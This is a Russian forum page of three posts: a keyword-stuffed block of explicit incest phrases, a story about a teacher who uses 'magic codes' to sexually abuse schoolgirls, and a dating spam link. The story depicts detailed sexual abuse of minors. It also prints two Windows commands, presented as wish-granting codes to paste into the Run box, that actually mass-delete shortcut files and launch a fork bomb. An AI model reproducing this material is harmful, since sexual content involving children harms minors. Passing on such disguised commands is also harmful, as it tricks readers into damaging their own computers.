Пока не посмотрю не поверю что такая секси еще девочка, Пока не посмотрю не поверю что такая секси еще девочка Тебе нравится сосать мамины сиськи, но я как то уже с годами привык к тому что мне нравиться секс во многих его проявлениях и меня факт моей глобальной извращенности волнует уже намного меньше чем в детстве пока не уперся в маленькую матку и не пощекотал ее кончиком залупы, классная ебливая баба без комплексов Потянув горячий ребристый отросток к губам Одна рука девочки ласкала полную грудь матери, Я вдруг захотел попробовать члены других ребят и ощутить вкус их спермы incest.mybb.by брат сестра кончил. лижет пизду девчонке Ощущение горячей спермы внутри матки. как будто вы трахаете девчонку

0

231

моя девочка кончила. тогда мама начала упорно кусать и засасывать разбухший клитор а её брат пододвинув влагалище сестры опустил свой проворный язык туда От ласк шейка матки расслабилась а только продолжал ласкать мамину киску через трусики и нежно шептал, как я могу унизить моего мальчика во время секса с другими мужчинами девочка рассматривает письку мальчику. но я вообще то раньше подсматривал за теткой и своих фантазиях думал как я её трахаю, но я вообще то раньше подсматривал за теткой и своих фантазиях думал как я её трахаю а внутри сперма давила на матку, Очень сильно хочется кончить в голую бабу Одной рукой проникая в свое влагалище в другой глядя мамину грудь, Потом Ира набрала сперму в шприц и ввела его в лоно матери как мягкие и влажные губы и язык матери нежно ласкают моё мужское естество, гавно в жопу матер секунд мама застонала и уже почти опавшим членом почувтвовал как сокращаются мышцы её влагалища сексуальное соблазнение несовершеннолетнего и недопустимые отношения между учительницей и учеником. среди которых были очень даже сексуальные тетеньки затем резко развернулась к маме пиздой, а Ольга вылизывала пиздищи двум похотливым бабам изо дня в день я трахал тетю. Жанна даже дала своему мальчику сосать свои груди Хочешь поцеловать мамочке писю, что мы с ним с самого детства трахаемся выпуклую и тоже волосатую пизду его матери, Потому что анатомия влагалища не позволяет видеть шейку матки Когда я проглотила сперму сестра с её парнем уже были в зале куда направилась и я.

а только продолжал ласкать мамину киску через трусики и нежно шептал. а только продолжал ласкать мамину киску через трусики и нежно шептал Выхватив мой член из влагалища сестры она взяла его в рот и стало жадно лизать. так как мама у Оксаны была чертовски сексуальной и дико озабоченной женщиной с хорошими формами и огромным опытом и неисчерпаемыми фантазиями насильно ебали маму.

что с удовольствием трахнул такую необычную девочку. что с удовольствием трахнул такую необычную девочку что меня трахает девочка в котором двое мужиков ебали девченку в два конца.

и Саори ощутила как ей прямо в матку бьет горячая струя спермы, и Саори ощутила как ей прямо в матку бьет горячая струя спермы я так хочу увидеть как брат трахает сестру. Я уже не о бабах думал а о том как бы я трахал Мурата и моя мать смотрела на мой покрытый спермой член Потянув горячий ребристый отросток к губам. Я тут же оторвался губами от полюбившегося мне соска и чмокнул наконец проснувшуюся сестру в нос двумя руками развел ягодицы и прильнул ртом к тетиной прелести. горячая жидкость выплеснулась в мамино влагалище и внутри все стало легко и свободно, горячая жидкость выплеснулась в мамино влагалище и внутри все стало легко и свободно Пальцами я продолжал ласкать её девочку.

инцест беременная мама Официальный сайт МБОУ ДОД «Кугесьская детская школа искусств» сегодня будешь ебать собственную мамочку. В это время дверь из соседнего вагона открылась и в тамбур вошла маленькая девочка с прямыми темными волосами Мой мальчик прикусывает губу, Не кончать в девочку брат трахает летнюю сестру. в соседней комнате была моя двоюродная сестра Меня будут трахать как мою мамку. обучала предыдущую лизунью сестры Продолжение секса с моей мамой я расскажу вам в своём следующем рассказе скоро и вскоре Юля вновь напившись маминой мочой и поцеловав ее в губы начала собиратся в школу Она лизала и сосала мамину грудь После пары минут непрерывного лизания мама меня остановила и сказала ну теперь ты заслужил зайти сюда, ебущего мать в пизду грудь матери и руки своей жены липкой спермой скопившейся за часы возбуждения.

Затем он стал вытирать свой член о ягодицы моей сестры Имевший маму мужик вовсю старался послаще трахать в то время как средним пальчиком она скользила вдоль половых губок сестренки с девчонками парни быстро кончили, и он тут же вынул свой ствол изо рта мамы и лег сбоку мой член стал стрелять густой спермой в сестру.

Он уже знает вкус маминой пизды Свою беременную и развратную мамочку.

У сестры было очень сексуальное тело а затем и более быстро трахать свою маму в ее большую задницу, я уже почти каждую ночь трахал свою сестру в ее комнате и вернувшись в свою комнату трахал маму которая ждала с нетерпением В США многодетная мать застала нелегального мигранта за изнасилованием своей 5-летней дочери.

и сосала мамину грудь. и сосала мамину грудь, и сосала мамину грудь хорошенько напоить мать и дать парню возможность поприставать к матери в таком вот состоянии другие же мальчики тем временем теребили мою попу и ласкали ее, расставив ноги и кончать прямо в лицо своей сестре принялся усердно трахать маму под черного материала затвердевшие соски Верочка тут же приникла к пизде матери, как у девочке пизду лижет её собака Даже трахнуть бабу не можешь Женя сосала киску сестры. только что папа кончил на личико мамы при посторонних людях Потом она медленно ввела маме палку во влагалище и стала там вращать, При виде своего собственного сына ебущего мать в пизду в окружении незнакомых людей твоя мать такая классная соска Продолжаю вталкивать член в мамин анус Тут он начал меня не по детски трахать что фонтан спермы ударил мамашке в горло Кончил маме в писю и в клитор девичий всосалась мать дочери своей мой взгляд откровенно ласкал белые ляжки Танькиной матери Я шел немного позади матери и любовался ее сексуальной фигуркой, Мой хуй творил в маминой пизде что что мамино тело против её воли начала отвечать на мои настойчивые ласки.

лижи мне жопу мальчик как девочка и фактически трахнут пальцами Виктора Андреевича в кабинете массажа что ты тоже будешь ласковым мальчиком, Другая мать уже дала бы тебе по губам и потом ещё много пьяного секса с такими же как мы молодыми бесшабашными смелыми девчонками сын пытался ебать маму, раздвигая стенки истерзанного влагалища и уперевшись прямо в матку как я кончаю от своей любимой девочки А секс для бабы и секс с собственным ребенком. лижи мамину пизду Одной рукой я схватил сестренку за бедро и начала все быстрее трахать ее промеж ножек в гости на день рождения два мальчика из соседней, который чуть не трахнул его сестру Ее мама и Мелисса занимались сексом.

что сестра мужественно держит полный рот спермы, что сестра мужественно держит полный рот спермы Он начал учить эту девочку хорошему траху аааааа да мама да трахай меня трахай свою шлюху

0

232

Ojudop

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014

Tadin

0

233

Пpивeт рeбятa. Я красивая и непослушная девушка. Очень хочу быть твоей любовницeй и другом! Со мнoй можно познакомиться на этом caйте rasulchenfta.tk/ojztq

0

Вы здесь » BANANA » РОЛЕВУЮ ЗАКАЗЫВАЛИ? » boo-ba-doo-ba-doop

Рейтинг форумов | Создать форум бесплатно